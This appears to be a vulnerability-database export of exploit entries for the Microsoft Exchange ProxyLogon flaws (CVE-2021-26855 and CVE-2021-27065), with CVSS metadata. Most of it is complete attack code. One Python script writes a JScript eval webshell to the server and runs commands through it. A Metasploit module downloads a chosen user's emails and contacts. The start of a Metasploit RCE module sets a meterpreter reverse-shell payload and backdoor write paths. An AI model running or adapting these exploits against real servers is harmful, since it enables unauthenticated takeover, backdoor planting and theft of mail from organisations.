ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=reset_oab_body, \nverify=False \n) \n \nif ct.status_code != 200: 
\nprint(\"\u5199\u5165shell\u5931\u8d25\u4e86\u554a\") \nexit() \n \nprint(\"\u6210\u529f\u4e86\u3002\u9a6c\u4e0a\u5c31\u9a8c\u8bc1shell\u662f\u5426OK!\") \nprint(\"POST shell:https://\"+target+\"/owa/auth/test11.aspx\") \nshell_url=\"https://\"+target+\"/owa/auth/test11.aspx\" \nprint('code=Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());') \nprint(\"\u6b63\u5728\u8bf7\u6c42shell\") \ndata=requests.post(shell_url,data={\"code\":\"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").exec(\\\"whoami\\\").StdOut.ReadAll());\"},verify=False) \nif data.status_code != 200: \nprint(\"\u5199\u5165shell\u5931\u8d25\") \nelse: \nprint(\"\u6743\u9650\u5982\u4e0b\uff1a\"+data.text.split(\"OAB (Default Web Site)\")[0].replace(\"Name : \",\"\")) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161846/msexchange2019-ssrfexec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-11-09T12:40:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-21T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-05-21T00:00:00", "id": "1337DAY-ID-36281", "href": "https://0day.today/exploit/description/36281", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)\n# Exploit Author: RAMELLA S\u00e9bastien\n# Vendor Homepage: https://microsoft.com\n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\n 'Description' => %q{\n This module scan for a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By chaining this bug with another post-auth arbitrary-file-write\n vulnerability to get code execution (CVE-2021-27065).\n\n As a result, an unauthenticated attacker can execute arbitrary commands on\n Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 
'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'],\n ['URL', 'http://aka.ms/exchangevulns']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\n OptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted'])\n ])\n\n register_advanced_options([\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512])\n ])\n end\n\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\n\n def grab_contacts\n response = send_xml(soap_findcontacts)\n xml = Nokogiri::XML.parse(response.body)\n\n data = xml.xpath('//t:Contact', XMLNS)\n if data.empty?\n print_status(' - the user has no contacts')\n else\n write_loot(data.to_s)\n end\n end\n\n def grab_emails(total_count)\n # get the emails list of the target folder.\n response = send_xml(soap_maillist(total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n # iteration to download the emails.\n xml.xpath('//t:ItemId', XMLNS).each do |item|\n print_status(\" - download item: #{item.values[1]}\")\n response = send_xml(soap_download(item.values[0], item.values[1]))\n xml = Nokogiri::XML.parse(response.body)\n\n message = xml.at_xpath('//t:MimeContent', XMLNS).content\n write_loot(Rex::Text.decode_base64(message))\n end\n end\n\n def send_xml(data)\n uri = normalize_uri('ecp', 'temp.js')\n\n received = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\",\n 'ctype' => 'text/xml; charset=utf-8',\n 'data' => 
data\n )\n fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_download(id, change_key)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_findcontacts\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='contacts'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_mailnum\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n 
xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>Default</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\">\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_maillist(max_entries)\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='#{datastore['FOLDER']}'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def write_loot(data)\n loot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '')\n print_good(\" - file saved to #{loot_path}\")\n end\n\n def run\n # get the informations about the targeted user account.\n response = send_xml(soap_mailnum)\n if response.body =~ /Success/\n print_status('Connection to the server is successful')\n print_status(\" - selected account: #{datastore['EMAIL']}\\n\")\n\n # grab contacts.\n print_status('Attempt to dump contacts list for this user')\n grab_contacts\n\n print_line\n\n # grab emails.\n print_status('Attempt to dump emails for this user')\n xml = Nokogiri::XML.parse(response.body)\n folder_id = xml.at_xpath('//t:FolderId', 
XMLNS).values\n print_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\")\n\n total_count = xml.at_xpath('//t:TotalCount', XMLNS).content\n print_status(\" - number of email found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n grab_emails(total_count)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T06:55:42", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-03-11T00:00:00", "id": "1337DAY-ID-35944", "href": "https://0day.today/exploit/description/35944", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)\r\n# 
Date: 2021-03-10\r\n# Exploit Author: testanull\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2013, 2016, 2019\r\n# CVE: 2021-26855, 2021-27065\r\n\r\nimport requests\r\nfrom urllib3.exceptions import InsecureRequestWarning\r\nimport random\r\nimport string\r\nimport sys\r\n\r\n\r\ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits):\r\n return ''.join(random.choice(chars) for _ in range(size))\r\n\r\nif len(sys.argv) < 2:\r\n\tprint(\"Usage: python PoC.py <target> <email>\")\r\n\tprint(\"Example: python PoC.py mail.evil.corp [email\u00a0protected]\")\r\n\texit()\r\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\r\ntarget = sys.argv[1]\r\nemail = sys.argv[2]\r\nrandom_name = id_generator(3) + \".js\"\r\nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\"\r\n\r\nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\ahihi.aspx\"\r\nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path\r\n\r\nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"exec_code\"],\"unsafe\");}</script>'\r\nlegacyDnPatchByte = \"68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a\"\r\nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\r\n <Request>\r\n <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\r\n </Request>\r\n</Autodiscover>\r\n\"\"\" % email\r\n\r\nprint(\"Attacking target \" + target)\r\nprint(\"=============================\")\r\nprint(legacyDnPatchByte.decode('hex'))\r\nFQDN = \"EXCHANGE\"\r\nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": 
\"X-BEResource=localhost~1942062522\",\r\n \"User-Agent\": user_agent},\r\n verify=False)\r\nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers:\r\n FQDN = ct.headers[\"X-FEServer\"]\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": user_agent},\r\n data=autoDiscoverBody,\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Autodiscover Error!\")\r\n exit()\r\nif \"<LegacyDN>\" not in ct.content:\r\n print(\"Can not get LegacyDN!\")\r\n exit()\r\n\r\nlegacyDn = ct.content.split(\"<LegacyDN>\")[1].split(\"</LegacyDN>\")[0]\r\nprint(\"Got DN: \" + legacyDn)\r\n\r\nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/mapi/[email\u00a0protected]ab&a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"application/mapi-http\",\r\n \"User-Agent\": user_agent\r\n},\r\n data=mapi_body,\r\n verify=False\r\n )\r\nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in ct.content:\r\n print(\"Mapi Error!\")\r\n exit()\r\n\r\nsid = ct.content.split(\"with SID \")[1].split(\" and MasterAccountSid\")[0]\r\n\r\nprint(\"Got SID: \" + sid)\r\n\r\nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r>\r\n\"\"\" % sid\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": user_agent\r\n},\r\n 
data=proxyLogon_request,\r\n verify=False\r\n )\r\nif ct.status_code != 241 or not \"set-cookie\" in ct.headers:\r\n print(\"Proxylogon Error!\")\r\n exit()\r\n\r\nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0]\r\n\r\nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0]\r\nprint(\"Got session id: \" + sess_id)\r\nprint(\"Got canary: \" + msExchEcpCanary)\r\n\r\nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, sess_id, msExchEcpCanary),\r\n \"User-Agent\": user_agent\r\n},\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Wrong canary!\")\r\n print(\"Sometime we can skip this ...\")\r\nrbacRole = ct.content.split(\"RBAC roles:</span> <span class='diagTxt'>\")[1].split(\"</span>\")[0]\r\n# print \"Got rbacRole: \"+ rbacRole\r\n\r\nprint(\"=========== It means good to go!!!====\")\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n\r\n},\r\n json={\"filter\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}},\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"GetOAB Error!\")\r\n exit()\r\noabId = ct.content.split('\"RawIdentity\":\"')[1].split('\"')[0]\r\nprint(\"Got OAB id: \" + oabId)\r\n\r\noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": 
oabId},\r\n \"properties\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}}\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n},\r\n json=oab_json,\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Set external url Error!\")\r\n exit()\r\n\r\nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId},\r\n \"properties\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"FilePathName\": shell_absolute_path}}}\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n},\r\n json=reset_oab_body,\r\n verify=False\r\n )\r\n\r\nif ct.status_code != 200:\r\n print(\"Write Shell Error!\")\r\n exit()\r\n\r\nprint(\"Successful!\")\n\n# 0day.today [2021-09-22] #", "sourceHref": "https://0day.today/exploit/35944", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T08:02:52", "description": "This Metasploit module exploits a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin 
(CVE-2021-26855) and write an arbitrary file (CVE-2021-27065) to obtain RCE (Remote Code Execution). By taking advantage of this vulnerability, an attacker can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 versions earlier than 15.00.1497.012, Exchange 2016 CU18 earlier than 15.01.2106.013, Exchange 2016 CU19 earlier than 15.01.2176.009, Exchange 2019 CU7 earlier than 15.02.0721.013, and Exchange 2019 CU8 earlier than 15.02.0792.010. All components are vulnerable by default.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "zdt", "title": "Microsoft Exchange ProxyLogon Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-23T00:00:00", "id": "1337DAY-ID-36024", "href": "https://0day.today/exploit/description/36024", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n 
prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull)\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)\n 'print(\"\")', # https://www.o2oxy.cn/3169.html\n 'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['CVE', '2021-27065'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'http://aka.ms/exchangevulns'],\n ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],\n [\n 'URL',\n 'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'\n ],\n ['URL', 'https://www.o2oxy.cn/3169.html'],\n ['URL', 
'https://github.com/Zeop-CyberSec/proxylogon_writeup']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',\n 'HttpClientTimeout' => 60,\n 'RPORT' => 443,\n 'SSL' => true,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])\n ])\n\n register_advanced_options([\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot 
directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0'])\n ])\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def execute_command(cmd, _opts = {})\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @random_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@random_inputname}=#{cmd}\"\n )\n end\n\n def install_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n input_name = rand_text_alpha(4..8).to_s\n shell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\"\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n 